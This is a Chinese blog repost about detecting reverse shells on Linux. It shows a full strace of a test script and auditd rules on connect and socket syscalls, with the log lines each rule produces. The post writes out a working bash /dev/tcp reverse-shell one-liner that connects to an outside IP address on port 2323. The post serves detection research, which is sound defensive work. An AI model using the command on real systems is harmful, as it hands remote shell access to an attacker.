反弹shell监控

转自：http://pirogue.org/2017/07/25/reverse-shell/

一、跟踪系统调用

1. strace bash test.sh

root@Kali:~/pirogue/reverse_shell# strace bash test.sh 
execve("/bin/bash", ["bash", "test.sh"], [/* 50 vars */]) = 0
brk(NULL)                               = 0x7a2000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb87000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=128554, ...}) = 0
mmap(NULL, 128554, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb67000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libtinfo.so.5", O_RDONLY|O_CLOEXEC) = 3
read(3, "177ELF2113>1260315"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=170776, ...}) = 0
mmap(NULL, 2267936, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd73d000
mprotect(0x7fcafd762000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd962000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fcafd962000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "177ELF2113>1200
"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=14640, ...}) = 0
mmap(NULL, 2109680, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd539000
mprotect(0x7fcafd53c000, 2093056, PROT_NONE) = 0
mmap(0x7fcafd73b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fcafd73b000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "177ELF21133>132032"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd19a000
mprotect(0x7fcafd32f000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd52f000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fcafd52f000
mmap(0x7fcafd535000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fcafd535000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb65000
arch_prctl(ARCH_SET_FS, 0x7fcafdb65b40) = 0
mprotect(0x7fcafd52f000, 16384, PROT_READ) = 0
mprotect(0x7fcafd73b000, 4096, PROT_READ) = 0
mprotect(0x7fcafd962000, 16384, PROT_READ) = 0
mprotect(0x700000, 12288, PROT_READ)    = 0
mprotect(0x7fcafdb8a000, 4096, PROT_READ) = 0
munmap(0x7fcafdb67000, 128554)          = 0
open("/dev/tty", O_RDWR|O_NONBLOCK)     = 3
close(3)                                = 0
brk(NULL)                               = 0x7a2000
brk(0x7a3000)                           = 0x7a3000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
brk(0x7a4000)                           = 0x7a4000
open("/usr/share/locale/locale.alias", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2995, ...}) = 0
brk(0x7a6000)                           = 0x7a6000
read(3, "# Locale name alias data base.
#"..., 4096) = 2995
brk(0x7a7000)                           = 0x7a7000
brk(0x7a8000)                           = 0x7a8000
read(3, "", 4096)                       = 0
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=368, ...}) = 0
mmap(NULL, 368, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb86000
close(3)                                = 0
open("/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26258, ...}) = 0
mmap(NULL, 26258, PROT_READ, MAP_SHARED, 3, 0) = 0x7fcafdb7f000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0
mmap(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7e000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0
mmap(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7d000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=167, ...}) = 0
mmap(NULL, 167, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7c000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_NAME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NAME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0
mmap(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7b000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_PAPER", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_PAPER", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0
mmap(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7a000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
close(3)                                = 0
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0
mmap(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb79000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=286, ...}) = 0
mmap(NULL, 286, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb78000
close(3)                                = 0
brk(0x7a9000)                           = 0x7a9000
open("/usr/lib/locale/en_US.UTF-8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1244054, ...}) = 0
mmap(NULL, 1244054, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafda35000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TIME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TIME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2454, ...}) = 0
mmap(NULL, 2454, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb77000
close(3)                                = 0
brk(0x7aa000)                           = 0x7aa000
open("/usr/lib/locale/en_US.UTF-8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0
mmap(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb76000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=328180, ...}) = 0
mmap(NULL, 328180, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafd9e4000
close(3)                                = 0
brk(0x7ab000)                           = 0x7ab000
getuid()                                = 0
getgid()                                = 0
geteuid()                               = 0
getegid()                               = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
ioctl(-1, TIOCGPGRP, 0x7ffeed7229ac)    = -1 EBADF (Bad file descriptor)
sysinfo({uptime=195741, loads=[21312, 14080, 6432], totalram=4148080640, freeram=202342400, sharedram=510382080, bufferram=24547328, totalswap=2145382400, freeswap=1889628160, procs=584, totalhigh=0, freehigh=0, mem_unit=1}) = 0
brk(0x7ac000)                           = 0x7ac000
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
uname({sysname="Linux", nodename="Kali", ...}) = 0
brk(0x7b0000)                           = 0x7b0000
brk(0x7b2000)                           = 0x7b2000
brk(0x7b4000)                           = 0x7b4000
brk(0x7b5000)                           = 0x7b5000
brk(0x7b6000)                           = 0x7b6000
brk(0x7b7000)                           = 0x7b7000
brk(0x7b8000)                           = 0x7b8000
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getpid()                                = 4833
brk(0x7b9000)                           = 0x7b9000
getppid()                               = 4831
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/usr/local/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/bash", 0x7ffeed722620)  = -1 ENOENT (No such file or directory)
stat("/usr/bin/bash", 0x7ffeed722620)   = -1 ENOENT (No such file or directory)
stat("/sbin/bash", 0x7ffeed722620)      = -1 ENOENT (No such file or directory)
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", X_OK)               = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", R_OK)               = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", X_OK)               = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", R_OK)               = 0
getpid()                                = 4833
brk(0x7ba000)                           = 0x7ba000
brk(0x7bb000)                           = 0x7bb000
getpgrp()                               = 4831
ioctl(2, TIOCGPGRP, [4831])             = 0
rt_sigaction(SIGCHLD, {sa_handler=0x44cf90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
getrlimit(RLIMIT_NPROC, {rlim_cur=15710, rlim_max=15710}) = 0
brk(0x7bc000)                           = 0x7bc000
brk(0x7bd000)                           = 0x7bd000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
brk(0x7be000)                           = 0x7be000
open("test.sh", O_RDONLY)               = 3
stat("test.sh", {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
ioctl(3, TCGETS, 0x7ffeed722940)        = -1 ENOTTY (Inappropriate ioctl for device)
lseek(3, 0, SEEK_CUR)                   = 0
read(3, "exec 9<> /dev/tcp/130.182.116.111"..., 80) = 73
lseek(3, 0, SEEK_SET)                   = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=4*1024}) = 0
fcntl(255, F_GETFD)                     = -1 EBADF (Bad file descriptor)
dup2(3, 255)                            = 255
close(3)                                = 0
fcntl(255, F_SETFD, FD_CLOEXEC)         = 0
fcntl(255, F_GETFL)                     = 0x8000 (flags O_RDONLY|O_LARGEFILE)
fstat(255, {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
lseek(255, 0, SEEK_CUR)                 = 0
brk(0x7bf000)                           = 0x7bf000
read(255, "exec 9<> /dev/tcp/130.182.116.111"..., 73) = 73
brk(0x7c0000)                           = 0x7c0000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(2323), sin_addr=inet_addr("130.182.116.111")}, 16) = 0
fcntl(9, F_GETFD)                       = -1 EBADF (Bad file descriptor)
dup2(3, 9)                              = 9
close(3)                                = 0
fcntl(0, F_GETFD)                       = 0
fcntl(0, F_DUPFD, 10)                   = 10
fcntl(0, F_GETFD)                       = 0
fcntl(10, F_SETFD, FD_CLOEXEC)          = 0
dup2(9, 0)                              = 0
fcntl(9, F_GETFD)                       = 0
close(10)                               = 0
fcntl(1, F_GETFD)                       = 0
fcntl(1, F_DUPFD, 10)                   = 10
fcntl(1, F_GETFD)                       = 0
fcntl(10, F_SETFD, FD_CLOEXEC)          = 0
dup2(9, 1)                              = 1
fcntl(9, F_GETFD)                       = 0
fcntl(2, F_GETFD)                       = 0
fcntl(2, F_DUPFD, 10)                   = 11
fcntl(2, F_GETFD)                       = 0
fcntl(11, F_SETFD, FD_CLOEXEC)          = 0
dup2(1, 2)                              = 2
fcntl(1, F_GETFD)                       = 0
close(11)                               = 0
close(10)                               = 0
brk(0x7c1000)                           = 0x7c1000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fcafdb65e10) = 4834
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0, NULL) = 4834
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4834, si_uid=0, si_status=127, si_utime=0, si_stime=0} ---
wait4(-1, 0x7ffeed722010, WNOHANG, NULL) = -1 ECHILD (No child processes)
rt_sigreturn({mask=[]})                 = 0
read(255, "", 73)                       = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
exit_group(127)                         = ?
+++ exited with 127 +++

2. strace -c bash test.sh

reverse-shell

二、audit监控分析

1. audit相关资料

A Brief Introduction to auditd

http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/
Finding short-lived TCP connections owner process

https://serverfault.com/questions/352259/finding-short-lived-tcp-connections-owner-process
Linux auditd

http://wiki.nokernel.net/linux-auditd
⁠Understanding Audit Log Files

https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Security_Guide/sec-Understanding_Audit_Log_Files.html
ubuntu - auditctl - a utility to assist controlling the kernel’s audit system

http://manpages.ubuntu.com/manpages/zesty/en/man8/auditctl.8.html
finding-short-lived-tcp-connections-owner-process

https://serverfault.com/questions/352259/finding-short-lived-tcp-connections-owner-process

2. 测试audit监控规则

auditctl -A exit,always -S connect
auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
auditctl -a exit,always -F arch=b64 -S connect

1) auditctl -a exit,always -F arch=b64 -S connect

root@Kali:~/pirogue/reverse_shell# auditctl -l
-a always,exit -F arch=b64 -S connect

回显：

tailf /var/log/audit/audit.log

type=CONFIG_CHANGE msg=audit(1500974819.373:24): auid=0 ses=3 op="add_rule" key=(null) list=4 res=1

bash test.sh

回显：

tailf /var/log/audit/audit.log

type=SYSCALL msg=audit(1500975246.989:30): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=1c052b8 a2=10 a3=129 items=0 ppid=4722 pid=7736 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
type=SOCKADDR msg=audit(1500975246.989:30): saddr=0200091385827E520000000000000000
type=PROCTITLE msg=audit(1500975246.989:30): proctitle=6261736800746573742E7368

exec 9<> /dev/tcp/130.182.116.111/2323;exec 0<&9;exec 1>&9 2>&1;/bin/bash

直接执行反弹命令，并没有audit到网络连接行为。但反弹shell中执行：whoami，出现回显。

type=SYSCALL msg=audit(1500975460.957:49): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798490 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=SOCKADDR msg=audit(1500975460.957:49): saddr=01002F7661722F72756E2F6E7363642F736F636B657400000000000000000000E029ECE3CD550000002CECE3CD55000000000000000000004B389E12077F00008028ECE3CD55000080988C12077F00001C000000000000004073C312077F0000F386799CFE7F0000100000000000
type=CWD msg=audit(1500975460.957:49): cwd="/root"
type=PATH msg=audit(1500975460.957:49): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
type=PROCTITLE msg=audit(1500975460.957:49): proctitle="whoami"
type=SYSCALL msg=audit(1500975460.961:50): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798640 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=SOCKADDR msg=audit(1500975460.961:50): saddr=01002F7661722F72756E2F6E7363642F736F636B65740000109AE512077F000001000000000000000000000000000000C887799CFE7F0000D120C412077F00000100000000000000109AE512077F0000010000000000000000000000000000000100000000000000000000000000
type=CWD msg=audit(1500975460.961:50): cwd="/root"
type=PATH msg=audit(1500975460.961:50): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
type=PROCTITLE msg=audit(1500975460.961:50): proctitle="whoami"

2) auditctl -a always,exit -F arch=b64 -S socket

type=SYSCALL msg=audit(1500976257.753:113): arch=c000003e syscall=41 success=yes exit=3 a0=2 a1=1 a2=6 a3=2b items=0 ppid=2409 pid=7894 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
type=PROCTITLE msg=audit(1500976257.753:113): proctitle="/usr/lib/gnome-terminal/gnome-terminal-server"

执行反弹命令直接监控到日志如上。输入whoami，也可监控到回显：

type=SYSCALL msg=audit(1500976407.153:125): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=PROCTITLE msg=audit(1500976407.153:125): proctitle="whoami"
type=SYSCALL msg=audit(1500976407.153:126): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=PROCTITLE msg=audit(1500976407.153:126): proctitle="whoami"

待续…

相关阅读:
[译]K-D-B-tree(草稿，第一次翻译)
[LeetCode]Letter Combinations of a Phone Number
[LeetCode]Multiply Strings
[LeetCode]Populating Next Right Pointers in Each Node
[LeetCode]Sum Root to Leaf Numbers
[LeetCode]String to Integer (atoi)
[LeetCode]Path Sum II
[LeetCode]Minimum Depth of Binary Tree
线上死锁问题排查
 Redis（四）：独立功能的实现
原文地址：https://www.cnblogs.com/0day5/p/8280400.html